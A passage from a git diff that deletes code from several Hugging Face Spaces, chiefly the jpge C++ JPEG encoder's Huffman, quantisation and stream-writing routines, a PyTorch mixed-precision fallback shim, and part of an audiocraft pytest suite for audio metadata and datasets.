symbol, assures that no valid code contains all 1's - int num_used_syms = 1; - const uint32 *pSym_count = &m_huff_count[table_num][0]; - for (int i = 0; i < table_len; i++) - if (pSym_count[i]) { syms0[num_used_syms].m_key = pSym_count[i]; syms0[num_used_syms++].m_sym_index = i + 1; } - sym_freq* pSyms = radix_sort_syms(num_used_syms, syms0, syms1); - calculate_minimum_redundancy(pSyms, num_used_syms); - - // Count the # of symbols of each code size. - int num_codes[1 + MAX_HUFF_CODESIZE]; clear_obj(num_codes); - for (int i = 0; i < num_used_syms; i++) - num_codes[pSyms[i].m_key]++; - - const uint JPGE_CODE_SIZE_LIMIT = 16; // the maximum possible size of a JPEG Huffman code (valid range is [9,16] - 9 vs. 8 because of the dummy symbol) - huffman_enforce_max_code_size(num_codes, num_used_syms, JPGE_CODE_SIZE_LIMIT); - - // Compute m_huff_bits array, which contains the # of symbols per code size. - clear_obj(m_huff_bits[table_num]); - for (int i = 1; i <= (int)JPGE_CODE_SIZE_LIMIT; i++) - m_huff_bits[table_num][i] = static_cast(num_codes[i]); - - // Remove the dummy symbol added above, which must be in largest bucket. - for (int i = JPGE_CODE_SIZE_LIMIT; i >= 1; i--) - { - if (m_huff_bits[table_num][i]) { m_huff_bits[table_num][i]--; break; } - } - - // Compute the m_huff_val array, which contains the symbol indices sorted by code size (smallest to largest). - for (int i = num_used_syms - 1; i >= 1; i--) - m_huff_val[table_num][num_used_syms - 1 - i] = static_cast(pSyms[i].m_sym_index - 1); -} - -// JPEG marker generation. -void jpeg_encoder::emit_byte(uint8 i) -{ - m_all_stream_writes_succeeded = m_all_stream_writes_succeeded && m_pStream->put_obj(i); -} - -void jpeg_encoder::emit_word(uint i) -{ - emit_byte(uint8(i >> 8)); emit_byte(uint8(i & 0xFF)); -} - -void jpeg_encoder::emit_marker(int marker) -{ - emit_byte(uint8(0xFF)); emit_byte(uint8(marker)); -} - -// Emit JFIF marker -void jpeg_encoder::emit_jfif_app0() -{ - emit_marker(M_APP0); - emit_word(2 + 4 + 1 + 2 + 1 + 2 + 2 + 1 + 1); - emit_byte(0x4A); emit_byte(0x46); emit_byte(0x49); emit_byte(0x46); /* Identifier: ASCII "JFIF" */ - emit_byte(0); - emit_byte(1); /* Major version */ - emit_byte(1); /* Minor version */ - emit_byte(0); /* Density unit */ - emit_word(1); - emit_word(1); - emit_byte(0); /* No thumbnail image */ - emit_byte(0); -} - -// Emit quantization tables -void jpeg_encoder::emit_dqt() -{ - for (int i = 0; i < ((m_num_components == 3) ? 2 : 1); i++) - { - emit_marker(M_DQT); - emit_word(64 + 1 + 2); - emit_byte(static_cast(i)); - for (int j = 0; j < 64; j++) - emit_byte(static_cast(m_quantization_tables[i][j])); - } -} - -// Emit start of frame marker -void jpeg_encoder::emit_sof() -{ - emit_marker(M_SOF0); /* baseline */ - emit_word(3 * m_num_components + 2 + 5 + 1); - emit_byte(8); /* precision */ - emit_word(m_image_y); - emit_word(m_image_x); - emit_byte(m_num_components); - for (int i = 0; i < m_num_components; i++) - { - emit_byte(static_cast(i + 1)); /* component ID */ - emit_byte((m_comp_h_samp[i] << 4) + m_comp_v_samp[i]); /* h and v sampling */ - emit_byte(i > 0); /* quant. table num */ - } -} - -// Emit Huffman table. -void jpeg_encoder::emit_dht(uint8 *bits, uint8 *val, int index, bool ac_flag) -{ - emit_marker(M_DHT); - - int length = 0; - for (int i = 1; i <= 16; i++) - length += bits[i]; - - emit_word(length + 2 + 1 + 16); - emit_byte(static_cast(index + (ac_flag << 4))); - - for (int i = 1; i <= 16; i++) - emit_byte(bits[i]); - - for (int i = 0; i < length; i++) - emit_byte(val[i]); -} - -// Emit all Huffman tables. -void jpeg_encoder::emit_dhts() -{ - emit_dht(m_huff_bits[0+0], m_huff_val[0+0], 0, false); - emit_dht(m_huff_bits[2+0], m_huff_val[2+0], 0, true); - if (m_num_components == 3) - { - emit_dht(m_huff_bits[0+1], m_huff_val[0+1], 1, false); - emit_dht(m_huff_bits[2+1], m_huff_val[2+1], 1, true); - } -} - -// emit start of scan -void jpeg_encoder::emit_sos() -{ - emit_marker(M_SOS); - emit_word(2 * m_num_components + 2 + 1 + 3); - emit_byte(m_num_components); - for (int i = 0; i < m_num_components; i++) - { - emit_byte(static_cast(i + 1)); - if (i == 0) - emit_byte((0 << 4) + 0); - else - emit_byte((1 << 4) + 1); - } - emit_byte(0); /* spectral selection */ - emit_byte(63); - emit_byte(0); -} - -// Emit all markers at beginning of image file. -void jpeg_encoder::emit_markers() -{ - emit_marker(M_SOI); - emit_jfif_app0(); - emit_dqt(); - emit_sof(); - emit_dhts(); - emit_sos(); -} - -// Compute the actual canonical Huffman codes/code sizes given the JPEG huff bits and val arrays. -void jpeg_encoder::compute_huffman_table(uint *codes, uint8 *code_sizes, uint8 *bits, uint8 *val) -{ - int i, l, last_p, si; - uint8 huff_size[257]; - uint huff_code[257]; - uint code; - - int p = 0; - for (l = 1; l <= 16; l++) - for (i = 1; i <= bits[l]; i++) - huff_size[p++] = (char)l; - - huff_size[p] = 0; last_p = p; // write sentinel - - code = 0; si = huff_size[0]; p = 0; - - while (huff_size[p]) - { - while (huff_size[p] == si) - huff_code[p++] = code++; - code <<= 1; - si++; - } - - memset(codes, 0, sizeof(codes[0])*256); - memset(code_sizes, 0, sizeof(code_sizes[0])*256); - for (p = 0; p < last_p; p++) - { - codes[val[p]] = huff_code[p]; - code_sizes[val[p]] = huff_size[p]; - } -} - -// Quantization table generation. -void jpeg_encoder::compute_quant_table(int32 *pDst, int16 *pSrc) -{ - int32 q; - if (m_params.m_quality < 50) - q = 5000 / m_params.m_quality; - else - q = 200 - m_params.m_quality * 2; - for (int i = 0; i < 64; i++) - { - int32 j = *pSrc++; j = (j * q + 50L) / 100L; - *pDst++ = JPGE_MIN(JPGE_MAX(j, 1), 255); - } -} - -// Higher-level methods. -void jpeg_encoder::first_pass_init() -{ - m_bit_buffer = 0; m_bits_in = 0; - memset(m_last_dc_val, 0, 3 * sizeof(m_last_dc_val[0])); - m_mcu_y_ofs = 0; - m_pass_num = 1; -} - -bool jpeg_encoder::second_pass_init() -{ - compute_huffman_table(&m_huff_codes[0+0][0], &m_huff_code_sizes[0+0][0], m_huff_bits[0+0], m_huff_val[0+0]); - compute_huffman_table(&m_huff_codes[2+0][0], &m_huff_code_sizes[2+0][0], m_huff_bits[2+0], m_huff_val[2+0]); - if (m_num_components > 1) - { - compute_huffman_table(&m_huff_codes[0+1][0], &m_huff_code_sizes[0+1][0], m_huff_bits[0+1], m_huff_val[0+1]); - compute_huffman_table(&m_huff_codes[2+1][0], &m_huff_code_sizes[2+1][0], m_huff_bits[2+1], m_huff_val[2+1]); - } - first_pass_init(); - emit_markers(); - m_pass_num = 2; - return true; -} - -bool jpeg_encoder::jpg_open(int p_x_res, int p_y_res, int src_channels) -{ - m_num_components = 3; - switch (m_params.m_subsampling) - { - case Y_ONLY: - { - m_num_components = 1; - m_comp_h_samp[0] = 1; m_comp_v_samp[0] = 1; - m_mcu_x = 8; m_mcu_y = 8; - break; - } - case H1V1: - { - m_comp_h_samp[0] = 1; m_comp_v_samp[0] = 1; - m_comp_h_samp[1] = 1; m_comp_v_samp[1] = 1; - m_comp_h_samp[2] = 1; m_comp_v_samp[2] = 1; - m_mcu_x = 8; m_mcu_y = 8; - break; - } - case H2V1: - { - m_comp_h_samp[0] = 2; m_comp_v_samp[0] = 1; - m_comp_h_samp[1] = 1; m_comp_v_samp[1] = 1; - m_comp_h_samp[2] = 1; m_comp_v_samp[2] = 1; - m_mcu_x = 16; m_mcu_y = 8; - break; - } - case H2V2: - { - m_comp_h_samp[0] = 2; m_comp_v_samp[0] = 2; - m_comp_h_samp[1] = 1; m_comp_v_samp[1] = 1; - m_comp_h_samp[2] = 1; m_comp_v_samp[2] = 1; - m_mcu_x = 16; m_mcu_y = 16; - } - } - - m_image_x = p_x_res; m_image_y = p_y_res; - m_image_bpp = src_channels; - m_image_bpl = m_image_x * src_channels; - m_image_x_mcu = (m_image_x + m_mcu_x - 1) & (~(m_mcu_x - 1)); - m_image_y_mcu = (m_image_y + m_mcu_y - 1) & (~(m_mcu_y - 1)); - m_image_bpl_xlt = m_image_x * m_num_components; - m_image_bpl_mcu = m_image_x_mcu * m_num_components; - m_mcus_per_row = m_image_x_mcu / m_mcu_x; - - if ((m_mcu_lines[0] = static_cast(jpge_malloc(m_image_bpl_mcu * m_mcu_y))) == NULL) return false; - for (int i = 1; i < m_mcu_y; i++) - m_mcu_lines[i] = m_mcu_lines[i-1] + m_image_bpl_mcu; - - compute_quant_table(m_quantization_tables[0], s_std_lum_quant); - compute_quant_table(m_quantization_tables[1], m_params.m_no_chroma_discrim_flag ? s_std_lum_quant : s_std_croma_quant); - - m_out_buf_left = JPGE_OUT_BUF_SIZE; - m_pOut_buf = m_out_buf; - - if (m_params.m_two_pass_flag) - { - clear_obj(m_huff_count); - first_pass_init(); - } - else - { - memcpy(m_huff_bits[0+0], s_dc_lum_bits, 17); memcpy(m_huff_val [0+0], s_dc_lum_val, DC_LUM_CODES); - memcpy(m_huff_bits[2+0], s_ac_lum_bits, 17); memcpy(m_huff_val [2+0], s_ac_lum_val, AC_LUM_CODES); - memcpy(m_huff_bits[0+1], s_dc_chroma_bits, 17); memcpy(m_huff_val [0+1], s_dc_chroma_val, DC_CHROMA_CODES); - memcpy(m_huff_bits[2+1], s_ac_chroma_bits, 17); memcpy(m_huff_val [2+1], s_ac_chroma_val, AC_CHROMA_CODES); - if (!second_pass_init()) return false; // in effect, skip over the first pass - } - return m_all_stream_writes_succeeded; -} - -void jpeg_encoder::load_block_8_8_grey(int x) -{ - uint8 *pSrc; - sample_array_t *pDst = m_sample_array; - x <<= 3; - for (int i = 0; i < 8; i++, pDst += 8) - { - pSrc = m_mcu_lines[i] + x; - pDst[0] = pSrc[0] - 128; pDst[1] = pSrc[1] - 128; pDst[2] = pSrc[2] - 128; pDst[3] = pSrc[3] - 128; - pDst[4] = pSrc[4] - 128; pDst[5] = pSrc[5] - 128; pDst[6] = pSrc[6] - 128; pDst[7] = pSrc[7] - 128; - } -} - -void jpeg_encoder::load_block_8_8(int x, int y, int c) -{ - uint8 *pSrc; - sample_array_t *pDst = m_sample_array; - x = (x * (8 * 3)) + c; - y <<= 3; - for (int i = 0; i < 8; i++, pDst += 8) - { - pSrc = m_mcu_lines[y + i] + x; - pDst[0] = pSrc[0 * 3] - 128; pDst[1] = pSrc[1 * 3] - 128; pDst[2] = pSrc[2 * 3] - 128; pDst[3] = pSrc[3 * 3] - 128; - pDst[4] = pSrc[4 * 3] - 128; pDst[5] = pSrc[5 * 3] - 128; pDst[6] = pSrc[6 * 3] - 128; pDst[7] = pSrc[7 * 3] - 128; - } -} - -void jpeg_encoder::load_block_16_8(int x, int c) -{ - uint8 *pSrc1, *pSrc2; - sample_array_t *pDst = m_sample_array; - x = (x * (16 * 3)) + c; - int a = 0, b = 2; - for (int i = 0; i < 16; i += 2, pDst += 8) - { - pSrc1 = m_mcu_lines[i + 0] + x; - pSrc2 = m_mcu_lines[i + 1] + x; - pDst[0] = ((pSrc1[ 0 * 3] + pSrc1[ 1 * 3] + pSrc2[ 0 * 3] + pSrc2[ 1 * 3] + a) >> 2) - 128; pDst[1] = ((pSrc1[ 2 * 3] + pSrc1[ 3 * 3] + pSrc2[ 2 * 3] + pSrc2[ 3 * 3] + b) >> 2) - 128; - pDst[2] = ((pSrc1[ 4 * 3] + pSrc1[ 5 * 3] + pSrc2[ 4 * 3] + pSrc2[ 5 * 3] + a) >> 2) - 128; pDst[3] = ((pSrc1[ 6 * 3] + pSrc1[ 7 * 3] + pSrc2[ 6 * 3] + pSrc2[ 7 * 3] + b) >> 2) - 128; - pDst[4] = ((pSrc1[ 8 * 3] + pSrc1[ 9 * 3] + pSrc2[ 8 * 3] + pSrc2[ 9 * 3] + a) >> 2) - 128; pDst[5] = ((pSrc1[10 * 3] + pSrc1[11 * 3] + pSrc2[10 * 3] + pSrc2[11 * 3] + b) >> 2) - 128; - pDst[6] = ((pSrc1[12 * 3] + pSrc1[13 * 3] + pSrc2[12 * 3] + pSrc2[13 * 3] + a) >> 2) - 128; pDst[7] = ((pSrc1[14 * 3] + pSrc1[15 * 3] + pSrc2[14 * 3] + pSrc2[15 * 3] + b) >> 2) - 128; - int temp = a; a = b; b = temp; - } -} - -void jpeg_encoder::load_block_16_8_8(int x, int c) -{ - uint8 *pSrc1; - sample_array_t *pDst = m_sample_array; - x = (x * (16 * 3)) + c; - for (int i = 0; i < 8; i++, pDst += 8) - { - pSrc1 = m_mcu_lines[i + 0] + x; - pDst[0] = ((pSrc1[ 0 * 3] + pSrc1[ 1 * 3]) >> 1) - 128; pDst[1] = ((pSrc1[ 2 * 3] + pSrc1[ 3 * 3]) >> 1) - 128; - pDst[2] = ((pSrc1[ 4 * 3] + pSrc1[ 5 * 3]) >> 1) - 128; pDst[3] = ((pSrc1[ 6 * 3] + pSrc1[ 7 * 3]) >> 1) - 128; - pDst[4] = ((pSrc1[ 8 * 3] + pSrc1[ 9 * 3]) >> 1) - 128; pDst[5] = ((pSrc1[10 * 3] + pSrc1[11 * 3]) >> 1) - 128; - pDst[6] = ((pSrc1[12 * 3] + pSrc1[13 * 3]) >> 1) - 128; pDst[7] = ((pSrc1[14 * 3] + pSrc1[15 * 3]) >> 1) - 128; - } -} - -void jpeg_encoder::load_quantized_coefficients(int component_num) -{ - int32 *q = m_quantization_tables[component_num > 0]; - int16 *pDst = m_coefficient_array; - for (int i = 0; i < 64; i++) - { - sample_array_t j = m_sample_array[s_zag[i]]; - if (j < 0) - { - if ((j = -j + (*q >> 1)) < *q) - *pDst++ = 0; - else - *pDst++ = static_cast(-(j / *q)); - } - else - { - if ((j = j + (*q >> 1)) < *q) - *pDst++ = 0; - else - *pDst++ = static_cast((j / *q)); - } - q++; - } -} - -void jpeg_encoder::flush_output_buffer() -{ - if (m_out_buf_left != JPGE_OUT_BUF_SIZE) - m_all_stream_writes_succeeded = m_all_stream_writes_succeeded && m_pStream->put_buf(m_out_buf, JPGE_OUT_BUF_SIZE - m_out_buf_left); - m_pOut_buf = m_out_buf; - m_out_buf_left = JPGE_OUT_BUF_SIZE; -} - -void jpeg_encoder::put_bits(uint bits, uint len) -{ - m_bit_buffer |= ((uint32)bits << (24 - (m_bits_in += len))); - while (m_bits_in >= 8) - { - uint8 c; - #define JPGE_PUT_BYTE(c) { *m_pOut_buf++ = (c); if (--m_out_buf_left == 0) flush_output_buffer(); } - JPGE_PUT_BYTE(c = (uint8)((m_bit_buffer >> 16) & 0xFF)); - if (c == 0xFF) JPGE_PUT_BYTE(0); - m_bit_buffer <<= 8; - m_bits_in -= 8; - } -} - -void jpeg_encoder::code_coefficients_pass_one(int component_num) -{ - if (component_num >= 3) return; // just to shut up static analysis - int i, run_len, nbits, temp1; - int16 *src = m_coefficient_array; - uint32 *dc_count = component_num ? m_huff_count[0 + 1] : m_huff_count[0 + 0], *ac_count = component_num ? m_huff_count[2 + 1] : m_huff_count[2 + 0]; - - temp1 = src[0] - m_last_dc_val[component_num]; - m_last_dc_val[component_num] = src[0]; - if (temp1 < 0) temp1 = -temp1; - - nbits = 0; - while (temp1) - { - nbits++; temp1 >>= 1; - } - - dc_count[nbits]++; - for (run_len = 0, i = 1; i < 64; i++) - { - if ((temp1 = m_coefficient_array[i]) == 0) - run_len++; - else - { - while (run_len >= 16) - { - ac_count[0xF0]++; - run_len -= 16; - } - if (temp1 < 0) temp1 = -temp1; - nbits = 1; - while (temp1 >>= 1) nbits++; - ac_count[(run_len << 4) + nbits]++; - run_len = 0; - } - } - if (run_len) ac_count[0]++; -} - -void jpeg_encoder::code_coefficients_pass_two(int component_num) -{ - int i, j, run_len, nbits, temp1, temp2; - int16 *pSrc = m_coefficient_array; - uint *codes[2]; - uint8 *code_sizes[2]; - - if (component_num == 0) - { - codes[0] = m_huff_codes[0 + 0]; codes[1] = m_huff_codes[2 + 0]; - code_sizes[0] = m_huff_code_sizes[0 + 0]; code_sizes[1] = m_huff_code_sizes[2 + 0]; - } - else - { - codes[0] = m_huff_codes[0 + 1]; codes[1] = m_huff_codes[2 + 1]; - code_sizes[0] = m_huff_code_sizes[0 + 1]; code_sizes[1] = m_huff_code_sizes[2 + 1]; - } - - temp1 = temp2 = pSrc[0] - m_last_dc_val[component_num]; - m_last_dc_val[component_num] = pSrc[0]; - - if (temp1 < 0) - { - temp1 = -temp1; temp2--; - } - - nbits = 0; - while (temp1) - { - nbits++; temp1 >>= 1; - } - - put_bits(codes[0][nbits], code_sizes[0][nbits]); - if (nbits) put_bits(temp2 & ((1 << nbits) - 1), nbits); - - for (run_len = 0, i = 1; i < 64; i++) - { - if ((temp1 = m_coefficient_array[i]) == 0) - run_len++; - else - { - while (run_len >= 16) - { - put_bits(codes[1][0xF0], code_sizes[1][0xF0]); - run_len -= 16; - } - if ((temp2 = temp1) < 0) - { - temp1 = -temp1; - temp2--; - } - nbits = 1; - while (temp1 >>= 1) - nbits++; - j = (run_len << 4) + nbits; - put_bits(codes[1][j], code_sizes[1][j]); - put_bits(temp2 & ((1 << nbits) - 1), nbits); - run_len = 0; - } - } - if (run_len) - put_bits(codes[1][0], code_sizes[1][0]); -} - -void jpeg_encoder::code_block(int component_num) -{ - DCT2D(m_sample_array); - load_quantized_coefficients(component_num); - if (m_pass_num == 1) - code_coefficients_pass_one(component_num); - else - code_coefficients_pass_two(component_num); -} - -void jpeg_encoder::process_mcu_row() -{ - if (m_num_components == 1) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8_grey(i); code_block(0); - } - } - else if ((m_comp_h_samp[0] == 1) && (m_comp_v_samp[0] == 1)) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8(i, 0, 0); code_block(0); load_block_8_8(i, 0, 1); code_block(1); load_block_8_8(i, 0, 2); code_block(2); - } - } - else if ((m_comp_h_samp[0] == 2) && (m_comp_v_samp[0] == 1)) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8(i * 2 + 0, 0, 0); code_block(0); load_block_8_8(i * 2 + 1, 0, 0); code_block(0); - load_block_16_8_8(i, 1); code_block(1); load_block_16_8_8(i, 2); code_block(2); - } - } - else if ((m_comp_h_samp[0] == 2) && (m_comp_v_samp[0] == 2)) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8(i * 2 + 0, 0, 0); code_block(0); load_block_8_8(i * 2 + 1, 0, 0); code_block(0); - load_block_8_8(i * 2 + 0, 1, 0); code_block(0); load_block_8_8(i * 2 + 1, 1, 0); code_block(0); - load_block_16_8(i, 1); code_block(1); load_block_16_8(i, 2); code_block(2); - } - } -} - -bool jpeg_encoder::terminate_pass_one() -{ - optimize_huffman_table(0+0, DC_LUM_CODES); optimize_huffman_table(2+0, AC_LUM_CODES); - if (m_num_components > 1) - { - optimize_huffman_table(0+1, DC_CHROMA_CODES); optimize_huffman_table(2+1, AC_CHROMA_CODES); - } - return second_pass_init(); -} - -bool jpeg_encoder::terminate_pass_two() -{ - put_bits(0x7F, 7); - flush_output_buffer(); - emit_marker(M_EOI); - m_pass_num++; // purposely bump up m_pass_num, for debugging - return true; -} - -bool jpeg_encoder::process_end_of_image() -{ - if (m_mcu_y_ofs) - { - if (m_mcu_y_ofs < 16) // check here just to shut up static analysis - { - for (int i = m_mcu_y_ofs; i < m_mcu_y; i++) - memcpy(m_mcu_lines[i], m_mcu_lines[m_mcu_y_ofs - 1], m_image_bpl_mcu); - } - - process_mcu_row(); - } - - if (m_pass_num == 1) - return terminate_pass_one(); - else - return terminate_pass_two(); -} - -void jpeg_encoder::load_mcu(const void *pSrc) -{ - const uint8* Psrc = reinterpret_cast(pSrc); - - uint8* pDst = m_mcu_lines[m_mcu_y_ofs]; // OK to write up to m_image_bpl_xlt bytes to pDst - - if (m_num_components == 1) - { - if (m_image_bpp == 4) - RGBA_to_Y(pDst, Psrc, m_image_x); - else if (m_image_bpp == 3) - RGB_to_Y(pDst, Psrc, m_image_x); - else - memcpy(pDst, Psrc, m_image_x); - } - else - { - if (m_image_bpp == 4) - RGBA_to_YCC(pDst, Psrc, m_image_x); - else if (m_image_bpp == 3) - RGB_to_YCC(pDst, Psrc, m_image_x); - else - Y_to_YCC(pDst, Psrc, m_image_x); - } - - // Possibly duplicate pixels at end of scanline if not a multiple of 8 or 16 - if (m_num_components == 1) - memset(m_mcu_lines[m_mcu_y_ofs] + m_image_bpl_xlt, pDst[m_image_bpl_xlt - 1], m_image_x_mcu - m_image_x); - else - { - const uint8 y = pDst[m_image_bpl_xlt - 3 + 0], cb = pDst[m_image_bpl_xlt - 3 + 1], cr = pDst[m_image_bpl_xlt - 3 + 2]; - uint8 *q = m_mcu_lines[m_mcu_y_ofs] + m_image_bpl_xlt; - for (int i = m_image_x; i < m_image_x_mcu; i++) - { - *q++ = y; *q++ = cb; *q++ = cr; - } - } - - if (++m_mcu_y_ofs == m_mcu_y) - { - process_mcu_row(); - m_mcu_y_ofs = 0; - } -} - -void jpeg_encoder::clear() -{ - m_mcu_lines[0] = NULL; - m_pass_num = 0; - m_all_stream_writes_succeeded = true; -} - -jpeg_encoder::jpeg_encoder() -{ - clear(); -} - -jpeg_encoder::~jpeg_encoder() -{ - deinit(); -} - -bool jpeg_encoder::init(output_stream *pStream, int64_t width, int64_t height, int64_t src_channels, const params &comp_params) -{ - deinit(); - if (((!pStream) || (width < 1) || (height < 1)) || ((src_channels != 1) && (src_channels != 3) && (src_channels != 4)) || (!comp_params.check_valid())) return false; - m_pStream = pStream; - m_params = comp_params; - return jpg_open(width, height, src_channels); -} - -void jpeg_encoder::deinit() -{ - jpge_free(m_mcu_lines[0]); - clear(); -} - -bool jpeg_encoder::process_scanline(const void* pScanline) -{ - if ((m_pass_num < 1) || (m_pass_num > 2)) return false; - if (m_all_stream_writes_succeeded) - { - if (!pScanline) - { - if (!process_end_of_image()) return false; - } - else - { - load_mcu(pScanline); - } - } - return m_all_stream_writes_succeeded; -} - -// Higher level wrappers/examples (optional). -#include - -class cfile_stream : public output_stream -{ - cfile_stream(const cfile_stream &); - cfile_stream &operator= (const cfile_stream &); - - FILE* m_pFile; - bool m_bStatus; - -public: - cfile_stream() : m_pFile(NULL), m_bStatus(false) { } - - virtual ~cfile_stream() - { - close(); - } - - bool open(const char *pFilename) - { - close(); -#if defined(_MSC_VER) - if (fopen_s(&m_pFile, pFilename, "wb") != 0) - { - return false; - } -#else - m_pFile = fopen(pFilename, "wb"); -#endif - m_bStatus = (m_pFile != NULL); - return m_bStatus; - } - - bool close() - { - if (m_pFile) - { - if (fclose(m_pFile) == EOF) - { - m_bStatus = false; - } - m_pFile = NULL; - } - return m_bStatus; - } - - virtual bool put_buf(const void* pBuf, int64_t len) - { - m_bStatus = m_bStatus && (fwrite(pBuf, len, 1, m_pFile) == 1); - return m_bStatus; - } - - uint get_size() const - { - return m_pFile ? ftell(m_pFile) : 0; - } -}; - -// Writes JPEG image to file. -bool compress_image_to_jpeg_file(const char *pFilename, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params) -{ - cfile_stream dst_stream; - if (!dst_stream.open(pFilename)) - return false; - - jpge::jpeg_encoder dst_image; - if (!dst_image.init(&dst_stream, width, height, num_channels, comp_params)) - return false; - - for (uint pass_index = 0; pass_index < dst_image.get_total_passes(); pass_index++) - { - for (int64_t i = 0; i < height; i++) - { - // i, width, and num_channels are all 64bit - const uint8* pBuf = pImage_data + i * width * num_channels; - if (!dst_image.process_scanline(pBuf)) - return false; - } - if (!dst_image.process_scanline(NULL)) - return false; - } - - dst_image.deinit(); - - return dst_stream.close(); -} - -class memory_stream : public output_stream -{ - memory_stream(const memory_stream &); - memory_stream &operator= (const memory_stream &); - - uint8 *m_pBuf; - uint64_t m_buf_size, m_buf_ofs; - -public: - memory_stream(void *pBuf, uint64_t buf_size) : m_pBuf(static_cast(pBuf)), m_buf_size(buf_size), m_buf_ofs(0) { } - - virtual ~memory_stream() { } - - virtual bool put_buf(const void* pBuf, int64_t len) - { - uint64_t buf_remaining = m_buf_size - m_buf_ofs; - if ((uint64_t)len > buf_remaining) - return false; - memcpy(m_pBuf + m_buf_ofs, pBuf, len); - m_buf_ofs += len; - return true; - } - - uint64_t get_size() const - { - return m_buf_ofs; - } -}; - -bool compress_image_to_jpeg_file_in_memory(void *pDstBuf, int64_t &buf_size, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params) -{ - if ((!pDstBuf) || (!buf_size)) - return false; - - memory_stream dst_stream(pDstBuf, buf_size); - - buf_size = 0; - - jpge::jpeg_encoder dst_image; - if (!dst_image.init(&dst_stream, width, height, num_channels, comp_params)) - return false; - - for (uint pass_index = 0; pass_index < dst_image.get_total_passes(); pass_index++) - { - for (int64_t i = 0; i < height; i++) - { - const uint8* pScanline = pImage_data + i * width * num_channels; - if (!dst_image.process_scanline(pScanline)) - return false; - } - if (!dst_image.process_scanline(NULL)) - return false; - } - - dst_image.deinit(); - - buf_size = dst_stream.get_size(); - return true; -} - -} // namespace jpge \ No newline at end of file diff --git a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/utils/amp.py b/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/utils/amp.py deleted file mode 100644 index ed97eb5b413a7f8375c3faa2135b0e3f3add230a..0000000000000000000000000000000000000000 --- a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/utils/amp.py +++ /dev/null @@ -1,14 +0,0 @@ -from contextlib import contextmanager - -@contextmanager -def nullcontext(enter_result=None, **kwargs): - yield enter_result - -try: - from torch.cuda.amp import autocast, GradScaler, custom_fwd, custom_bwd -except: - print('[Warning] Library for automatic mixed precision is not found, AMP is disabled!!') - GradScaler = nullcontext - autocast = nullcontext - custom_fwd = nullcontext - custom_bwd = nullcontext \ No newline at end of file diff --git a/spaces/hasibzunair/fifa-tryon-demo/models/__init__.py b/spaces/hasibzunair/fifa-tryon-demo/models/__init__.py deleted file mode 100644 index 8a3f782535e343701ca598947ed76cdcc491d2ea..0000000000000000000000000000000000000000 --- a/spaces/hasibzunair/fifa-tryon-demo/models/__init__.py +++ /dev/null @@ -1 +0,0 @@ -# model_init diff --git a/spaces/hebert2099/MusicGen/tests/data/test_audio_dataset.py b/spaces/hebert2099/MusicGen/tests/data/test_audio_dataset.py deleted file mode 100644 index b69c9c397830738b73d6c229009f84b867cda801..0000000000000000000000000000000000000000 --- a/spaces/hebert2099/MusicGen/tests/data/test_audio_dataset.py +++ /dev/null @@ -1,352 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from functools import partial -from itertools import product -import json -import math -import os -import random -import typing as tp - -import pytest -import torch -from torch.utils.data import DataLoader - -from audiocraft.data.audio_dataset import ( - AudioDataset, - AudioMeta, - _get_audio_meta, - load_audio_meta, - save_audio_meta -) -from audiocraft.data.zip import PathInZip - -from ..common_utils import TempDirMixin, get_white_noise, save_wav - - -class TestAudioMeta(TempDirMixin): - - def test_get_audio_meta(self): - sample_rates = [8000, 16_000] - channels = [1, 2] - duration = 1. - for sample_rate, ch in product(sample_rates, channels): - n_frames = int(duration * sample_rate) - wav = get_white_noise(ch, n_frames) - path = self.get_temp_path('sample.wav') - save_wav(path, wav, sample_rate) - m = _get_audio_meta(path, minimal=True) - assert m.path == path, 'path does not match' - assert m.sample_rate == sample_rate, 'sample rate does not match' - assert m.duration == duration, 'duration does not match' - assert m.amplitude is None - assert m.info_path is None - - def test_save_audio_meta(self): - audio_meta = [ - AudioMeta("mypath1", 1., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file1.json')), - AudioMeta("mypath2", 2., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file2.json')) - ] - empty_audio_meta = [] - for idx, meta in enumerate([audio_meta, empty_audio_meta]): - path = self.get_temp_path(f'data_{idx}_save.jsonl') - save_audio_meta(path, meta) - with open(path, 'r') as f: - lines = f.readlines() - read_meta = [AudioMeta.from_dict(json.loads(line)) for line in lines] - assert len(read_meta) == len(meta) - for m, read_m in zip(meta, read_meta): - assert m == read_m - - def test_load_audio_meta(self): - try: - import dora - except ImportError: - dora = None # type: ignore - - audio_meta = [ - AudioMeta("mypath1", 1., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file1.json')), - AudioMeta("mypath2", 2., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file2.json')) - ] - empty_meta = [] - for idx, meta in enumerate([audio_meta, empty_meta]): - path = self.get_temp_path(f'data_{idx}_load.jsonl') - with open(path, 'w') as f: - for m in meta: - json_str = json.dumps(m.to_dict()) + '\n' - f.write(json_str) - read_meta = load_audio_meta(path) - assert len(read_meta) == len(meta) - for m, read_m in zip(meta, read_meta): - if dora: - m.path = dora.git_save.to_absolute_path(m.path) - assert m == read_m, f'original={m}, read={read_m}' - - -class TestAudioDataset(TempDirMixin): - - def _create_audio_files(self, - root_name: str, - num_examples: int, - durations: tp.Union[float, tp.Tuple[float, float]] = (0.1, 1.), - sample_rate: int = 16_000, - channels: int = 1): - root_dir = self.get_temp_dir(root_name) - for i in range(num_examples): - if isinstance(durations, float): - duration = durations - elif isinstance(durations, tuple) and len(durations) == 1: - duration = durations[0] - elif isinstance(durations, tuple) and len(durations) == 2: - duration = random.uniform(durations[0], durations[1]) - else: - assert False - n_frames = int(duration * sample_rate) - wav = get_white_noise(channels, n_frames) - path = os.path.join(root_dir, f'example_{i}.wav') - save_wav(path, wav, sample_rate) - return root_dir - - def _create_audio_dataset(self, - root_name: str, - total_num_examples: int, - durations: tp.Union[float, tp.Tuple[float, float]] = (0.1, 1.), - 